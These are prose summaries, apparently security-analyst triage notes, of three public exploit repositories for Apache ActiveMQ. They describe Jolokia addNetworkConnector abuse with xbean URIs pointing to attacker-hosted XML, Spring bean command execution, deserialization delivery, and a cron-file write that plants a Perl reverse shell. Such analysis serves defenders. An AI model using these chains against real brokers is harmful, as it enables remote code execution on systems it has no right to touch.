Apache ActiveMQ Classic Jolokia addNetworkConnector Remote Code Execution

This repository is a minimal proof-of-concept exploit consisting of a single Spring XML bean definition file and a .gitattributes file. The XML PoC uses org.springframework.beans.factory.config.MethodInvokingFactoryBean twice: first to obtain a java.lang.Runtime instance via Runtime.getRuntime(), and then to invoke Runtime.exec() with a shell command. The hardcoded payload runs /bin/sh -c "touch /tmp/activemq_pwned", which creates a marker file to demonstrate successful code execution. The exploit’s core capability is arbitrary command execution, provided the target application deserializes, imports, or otherwise processes attacker-supplied Spring bean XML. There is no networking logic, delivery mechanism, authentication handling, or target discovery in the repository; it is only the malicious bean configuration payload. The attack is therefore best characterized as a file/web-delivered Spring XML RCE payload rather than a complete end-to-end exploit tool. Repository structure is extremely small: 2 total files, with 1 code-like artifact (the XML PoC). No framework affiliation is evident. Because the payload is hardcoded and functional, this is an operational PoC rather than a mere detection artifact.

Repository is a small standalone Python exploit for CVE-2026-42588 targeting Apache ActiveMQ Jolokia-authenticated RCE. Structure is simple: one main exploit script (CVE-2026-42588_EXP.py), one malicious Spring XML template (malicious.xml), dependency file, README, and CI metadata. The Python script uses requests and HTTP Basic Auth to interact with the target Jolokia endpoint at /api/jolokia/. It builds a JSON exec request against the default MBean org.apache.activemq:type=Broker,brokerName=localhost and invokes addNetworkConnector with a crafted masterslave:// URI containing brokerConfig=xbean:<remote_xml_url>. This causes the target to fetch attacker-controlled XML and instantiate Spring beans that execute OS commands. The script includes both detection logic (check whether Jolokia is reachable and optionally extract version info) and exploitation logic (send payload, handle HTTP/auth errors, and print guidance for asynchronous verification). The included malicious.xml demonstrates two execution paths: MethodInvokingFactoryBean calling Runtime.getRuntime().exec(), and ProcessBuilder with init-method="start". README documents prerequisites, vulnerable versions, example commands, reverse shell usage, Windows adaptation, and mitigations. Overall, this is a real operational exploit with a basic but functional payload chain rather than a mere detector.

This repository is a standalone Java Swing exploit toolkit for Apache ActiveMQ, not a Metasploit/Nuclei module. The project is Maven-based, with a single executable entry point in src/main/java/cc/kiiy/App.java that launches a GUI (MainFrame). The codebase is organized into service classes for exploitation/detection logic (EnvironmentService, VulnerabilityService), UI panels for each supported CVE and settings, and utility helpers for HTTP and local config handling. Core capability-wise, the tool supports both detection and exploitation. EnvironmentService fingerprints ActiveMQ by requesting the target URL and checking for the Apache ActiveMQ title, and can authenticate to /admin/ using HTTP Basic auth to extract hostname, version, and uptime from the admin console HTML. VulnerabilityService is the main exploit engine. For CVE-2015-5254, it accepts a user-provided Base64 serialized payload, decodes it, wraps it into an ActiveMQObjectMessage, and sends it over OpenWire/JMS to a chosen queue on tcp://<host>:<port> (default 61616), enabling broker-side deserialization when the message is processed/viewed. For CVE-2016-3088, it performs a PUT to /fileserver/<random>.txt and then a MOVE to file:///etc/cron.d/root, planting a cron entry that launches a Perl reverse shell back to the operator. This is a real exploitation path, not just a detector, but it depends on vulnerable behavior and elevated target privileges. The repository also includes support for CVE-2022-41678 workflows. Although the provided content truncates some of the implementation, the UI and service references clearly show functionality to write a default or custom webshell and then execute commands through it, with selectable methods such as auto, log4j2, and jfr. The included JfrTemplate.java contains a large embedded JFR configuration template, indicating one exploitation path abuses JFR-related file write/config behavior. BeanXmlPanel generates Spring BeanXML payloads using java.lang.ProcessBuilder for arbitrary command execution, likely intended to support XML-based ActiveMQ exploitation such as CVE-2023-46604-style xbean loading. The code also contains logic for a Jolokia-based probe labeled CVE-2026-34197 that sends an addNetworkConnector request with a vm://evil?brokerConfig=xbean:<xmlServer> argument, causing the target to fetch attacker-controlled XML from an external server. Network and fingerprintable artifacts are abundant: HTTP(S) access to the target web console and admin paths, OpenWire TCP access to port 61616, PUT/MOVE requests to /fileserver/, file destinations like file:///etc/cron.d/root, attacker XML hosting URLs, and Basic Authorization headers. The GUI exposes global custom headers and proxy settings, allowing the operator to tune requests and route traffic through a local proxy. Overall, this is an operational multi-CVE ActiveMQ exploitation toolkit with a GUI front end, combining reconnaissance, authenticated checks, payload generation, deserialization delivery, arbitrary file write abuse, XML-based RCE testing, and webshell management.